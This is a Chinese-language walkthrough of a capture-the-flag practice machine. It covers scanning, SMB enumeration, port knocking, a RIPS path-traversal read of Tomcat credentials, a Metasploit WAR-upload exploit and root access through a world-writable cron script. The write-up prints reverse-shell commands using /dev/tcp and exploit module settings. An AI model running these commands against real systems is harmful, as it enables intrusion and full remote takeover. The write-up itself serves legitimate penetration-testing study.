# 靶场搭建
下载后直接导入,就能打
# 渗透过程
# 信息初收集
22/tcp filtered ssh | |
53/tcp open domain | |
80/tcp filtered http | |
110/tcp open pop3 | |
139/tcp open netbios-ssn | |
143/tcp open imap | |
445/tcp open microsoft-ds | |
993/tcp open imaps | |
995/tcp open pop3s | |
8080/tcp open http-proxy |
smb 服务先漏洞摸一下,没摸出来
80 端口带了过滤,8080 端口有 web 服务,摸一下
[05:02:42] 302 - 0B - /docs -> http://192.168.1.132:8080/docs/
[05:02:42] 200 - 18KB - /docs/
[05:02:46] 200 - 5KB - /examples/servlets/index.html
[05:02:46] 200 - 714B - /examples/servlets/servlet/CookieExample
[05:02:46] 200 - 1KB - /examples/
[05:02:46] 200 - 685B - /examples/jsp/snp/snoop.jsp
[05:02:46] 200 - 1KB - /examples/websocket/index.xhtml
[05:02:46] 302 - 0B - /examples -> http://192.168.1.132:8080/examples/
[05:02:46] 200 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[05:02:46] 200 - 19KB - /examples/jsp/index.html
[05:02:53] 302 - 0B - /host-manager/ -> http://192.168.1.132:8080/host-manager/html
[05:02:53] 401 - 2KB - /host-manager/html
[05:03:03] 302 - 0B - /manager -> http://192.168.1.132:8080/manager/
[05:03:03] 302 - 0B - /manager/ -> http://192.168.1.132:8080/manager/html
[05:03:03] 401 - 2KB - /manager/html/
[05:03:04] 404 - 2KB - /manager/admin.asp
[05:03:04] 401 - 2KB - /manager/jmxproxy
[05:03:04] 401 - 2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[05:03:04] 401 - 2KB - /manager/jmxproxy/?qry=STUFF
[05:03:04] 401 - 2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[05:03:04] 401 - 2KB - /manager/status/all
[05:03:04] 404 - 2KB - /manager/login.asp
[05:03:04] 401 - 2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[05:03:04] 404 - 2KB - /manager/VERSION
[05:03:03] 401 - 2KB - /manager/html
[05:03:04] 404 - 2KB - /manager/login
[05:03:04] 401 - 2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[05:03:04] 401 - 2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[05:03:23] 200 - 45B - /robots.txt
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default Tomcat Manager / Host Manager interface found.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/status: Default Tomcat Server Status interface found.
robots.txt 中有个目录,打开是个 base64 编码,解一下
┌──(root㉿kali)-[~] | |
└─# echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==' | base64 -d | |
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list. | |
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her. | |
No fluffy bunnies for those who set insecure passwords and endanger the enterprise. |
哦吼,知道了有员工使用了 password 作为密码。
通过 samba 服务,用 enum4linux 工具枚举一下用户
S-1-5-21-3544418579-3748865642-433680629-501 MERCY\nobody (Local User) | |
S-1-5-21-3544418579-3748865642-433680629-513 MERCY\None (Domain Group) | |
S-1-5-21-3544418579-3748865642-433680629-1000 MERCY\pleadformercy (Local User) | |
S-1-5-21-3544418579-3748865642-433680629-1001 MERCY\qiu (Local User) |
综合其它信息来看,最有可能是这个 qiu 用户密码泄露
# 文件共享
共享文件夹信息:
//192.168.1.132/print$ Mapping: DENIED Listing: N/A Writing: N/A | |
//192.168.1.132/qiu Mapping: DENIED Listing: N/A Writing: N/A |
访问 qiu 路径,看看有啥东西
┌──(root㉿kali)-[~/Desktop] | |
└─# smbclient -U qiu \\\\192.168.1.132\\qiu | |
Password for [WORKGROUP\qiu]: | |
Try "help" to get a list of possible commands. | |
smb: \> dir | |
. D 0 Fri Aug 31 15:07:00 2018 | |
.. D 0 Mon Nov 19 11:59:09 2018 | |
.bashrc H 3637 Sun Aug 26 09:19:34 2018 | |
.public DH 0 Sun Aug 26 10:23:24 2018 | |
.bash_history H 163 Fri Aug 31 15:11:34 2018 | |
.cache DH 0 Fri Aug 31 14:22:05 2018 | |
.private DH 0 Sun Aug 26 12:35:34 2018 | |
.bash_logout H 220 Sun Aug 26 09:19:34 2018 | |
.profile H 675 Sun Aug 26 09:19:34 2018 | |
19213004 blocks of size 1024. 16327616 blocks available |
看了一眼.bash_history 的文件,发现执行了 configprint 文件,搞下来看看
发现是写入 knock 配置文件,还同步进了 config 文件
那么查看一下这个 config 文件吧
Here are settings for your perusal.
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[closeHTTP]
sequence = 4,27391,159
seq_timeout = 100
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9999,28504,17301
seq_timeout = 100
command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
可以看到敲击规则,那么我们按规则 knock 一下,打开 http 和 ssh
# knock 开放端口
knock 192.168.1.132 159 27391 4
knock 192.168.1.132 17301 28504 9999
ssh 开放了常使用 qiu 账户登录,登不上去 ==、
那就只有看 80 端口了
# 80 端口
[05:28:03] 200 - 67B - /login.html
[05:28:25] 200 - 50B - /robots.txt
User-agent: *
Disallow: /mercy
Disallow: /nomercy
mercy 给了个提示,可能跟获取系统时间有关系,没看明白。
nomercy 是个 cms, rips 直接搜一下漏洞
# rips 漏洞利用
文件包含漏洞,直接配置一下直接 run
msf6 auxiliary(scanner/http/rips_traversal) > show options
Module options (auxiliary/scanner/http/rips_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 5 yes Traversal Depth (to reach the root folder)
FILEPATH /etc/passwd yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.132 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nomercy/ yes The URI path to the web application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
发现能够读取 passwd 文件的,那么我们包含以下 8080 端口的 tomcat 配置文件看看密码: /etc/tomcat7/tomcat-users.xml
<? <role rolename="admin-gui"/>
<? <role rolename="manager-gui"/>
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
<? </tomcat-users>
拿到了两组账号密码: thisisasuperduperlonguser/heartbreakisinevitable 和 fluffy/freakishfluffybunny
# tomcat 上传 war 包
配置如下,直接 run
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword heartbreakisinevitable no The password for the specified username
HttpUsername thisisasuperduperlonguser no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.132 yes The target host(s), see https://docs.metasploit.com/docs/using-me
tasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will
be used)
VHOST no HTTP server virtual host
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux x86
View the full module info with the info, or info -d command.
拿到 tomcat7 的 shell
# 提权
之前有一个 fluffy 的账号,ssh 连不上去的,可以直接 su 过去
拿到 fluffy 账号的 shell 之后看一下目录, /home/fluffy/.private/secrets 目录有一个 timeclock 文件是 777 权限,估计是个计划任务,直接写入反弹 shell: echo "bash -i >& /dev/tcp/192.168.1.129/8080 0>&1" >> timeclock
监听等待之后直接拿到 root 的 shell。完活
# 小结
反弹 shell 的时候用了两个反弹命令,讲道理应该都能弹出来,但是并没有
将 /bin/bash -i > /dev/tcp/192.168.1.129/443 0<& 2>&1 写入 timeclock,并没有反弹成功
可能跟 shell 不全有关系。知道的哥们敲我
